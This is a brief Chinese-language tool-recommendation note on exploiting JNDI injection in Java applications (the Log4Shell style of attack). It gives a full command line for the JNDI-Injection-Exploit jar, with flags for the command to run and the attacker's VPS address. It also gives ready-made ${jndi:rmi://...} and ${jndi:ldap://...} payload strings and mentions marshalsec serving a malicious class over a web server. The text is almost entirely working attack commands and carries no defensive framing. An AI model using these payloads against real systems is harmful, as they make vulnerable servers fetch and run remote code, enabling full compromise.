工具推荐

JNDI-Injection-Exploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C "calc.exe" -A 127.0.0.1
#-C 指定要执行的命令
#-A vps的ip
#!# 1099,8180,1389三个端口不可占用

执行完毕就是常用的利用链

${jndi:rmi://127.0.0.1:1099/pfpvmj}

marshalsec

这个需要配合web服务去下载恶意lei

或者使用改进版LDAPKit

${jndi:ldap://127.0.0.1:1389/badClassName}